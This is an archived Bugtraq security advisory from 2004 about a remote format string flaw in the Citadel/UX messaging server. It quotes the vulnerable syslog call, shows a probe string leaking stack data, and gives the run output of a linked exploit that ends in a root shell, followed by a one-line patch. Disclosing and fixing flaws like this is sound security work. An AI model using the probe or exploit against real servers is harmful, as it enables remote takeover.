Citadel/UX <= v6.27 Remote Format String Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Citadel/UX <= v6.27 Remote Format String Vulnerability
From: CoKi <coki@xxxxxxxxxxxxxxx>
Date: 13 Dec 2004 00:06:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


-------------------------------------------------
No System Group - Advisory #09 - 12/12/04
-------------------------------------------------
Program: Citadel/UX
Homepage: http://www.citadel.org
Operating System: Linux and Unix-Compatible
Vulnerable Versions: Citadel/UX v6.27 and prior
Risk: High
Impact: Remote Format String Vulnerability
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
Citadel/UX is an advanced client/server messaging and
collaboration system for BBS and groupware applications.
Users can connect to Citadel/UX using any telnet, WWW,
or client software. Among the features supported are
public and private message bases (rooms), electronic
mail, real-time chat, paging, etc. The server is
multithreaded and can easily support a large number of
concurrent users. In addition, SMTP, IMAP, and POP3
servers are built-in for easy connection to Internet
mail. Citadel/UX is both robust and mature, having been
developed over the course of the past thirteen years.

More informations at: http://www.citadel.org


- DETAILS
-------------------------------------------------
Exist a format string bug in the lprintf() function
of sysdep.c when parses erroneous arguments to the
syslog() function. This may to cause a denial of
service or give remote shell with privileges of
Citadel/UX.

---------- sysdep.c ----------
108: void lprintf(enum LogLevel loglevel, const char *format, ...) {
109:         va_list arg_ptr;
110:         char buf[SIZ];
111: 
112:         va_start(arg_ptr, format);   
113:         vsnprintf(buf, sizeof(buf), format, arg_ptr);
114:         va_end(arg_ptr);
115:
116:         if (syslog_facility >= 0) {
117:                 if (loglevel <= verbosity) {
118:                         /* Hackery -IO */
119:                         if (CC && CC->cs_pid) {
120:                                 memmove(buf + 6, buf, sizeof(buf) - 6);
121:                                 snprintf(buf, 6, "[%3d]", CC->cs_pid); 
122:                                 buf[5] = ' ';                         
123:                         }
124:                         syslog(loglevel, buf); // <-- the format bug
125:                 }
126:         }
---------- sysdep.c ----------

Now we proceed to see what happens.

coki@nosystem:~/audit$ telnet localhost 504
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 nosystem Citadel server ready.
AAAA%x
530 Unrecognized or unsupported command.
quit
200 Goodbye.
Connection closed by foreign host.
coki@nosystem:~/audit$

We connect us to Citadel/UX server to 504 port and
send a test string.

coki@nosystem:~/audit$ tail -n 5 /var/log/messages  
Dec 12 11:08:18 nosystem citadel[1305]: Database log file cull ended. 
Dec 12 11:08:19 nosystem citadel[1303]: [  1] Session started. 
Dec 12 11:08:33 nosystem citadel[1303]: [  1] Citadel: AAAA8090fe0 
Dec 12 11:08:35 nosystem citadel[1303]: [  1] Citadel: quit 
Dec 12 11:08:35 nosystem citadel[1303]: [  1] Session ended. 
coki@nosystem:~/audit$

We can to see part of the stack sending a malicious format string.


- EXPLOIT
-------------------------------------------------
I have written a code exploit that use this format bug
for to obtain a remote shell in a target.

http://www.nosystem.com.ar/exploits/citadel_fsexp.c

coki@servidor:~$ make citadel_fsexp
coki@nosystem:~/audit$ ./citadel_fsexp -h localhost -t0

 Citadel/UX v6.27 remote format string exploit
 by CoKi <coki@xxxxxxxxxxxxxxx>

 [*] host                       : localhost
 [*] system                     : Slackware Linux 10.0
 [*] syslog GOT address         : 0x0809e9e8
 [*] RET address                : 0xbfffd5fa

 [+] verifying host...          OK
 [+] conecting...               OK
 [+] building evil buffer...    OK
 [+] sending evil buffer...     OK

 [+] waiting for shell...
 [+] connecting to shell...     OK

 [!] you have a shell :)

Linux nosystem 2.4.26 #29 Mon Jun 14 19:22:30 PDT 2004 i686 unknown unknown 
GNU/Linux
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)


- SOLUTIONS
-------------------------------------------------
The patch is included here:

--- sysdep.c    2004-11-03 17:19:00.000000000 -0300
+++ sysdep.c    2004-12-12 13:14:12.000000000 -0300
@@ -121,7 +121,7 @@
                                snprintf(buf, 6, "[%3d]", CC->cs_pid);
                                buf[5] = ' ';
                        }
-                       syslog(loglevel, buf);
+                       syslog(loglevel, "%s", buf);
                }
        }
        else if (loglevel <= verbosity) { 


- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-09.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <coki@xxxxxxxxxxxxxxx>

No System Group - http://www.nosystem.com.ar

Follow-Ups:
- Re: Citadel/UX <= v6.27 Remote Format String Vulnerability
  - From: Michael Hampton

Prev by Date: Multiple vulnerabilities in phpMyAdmin
Next by Date: MS IE User's Authentication Details (userid/password) Sharing Issue
Previous by thread: Multiple vulnerabilities in phpMyAdmin
Next by thread: Re: Citadel/UX <= v6.27 Remote Format String Vulnerability
Index(es):
- Date
- Thread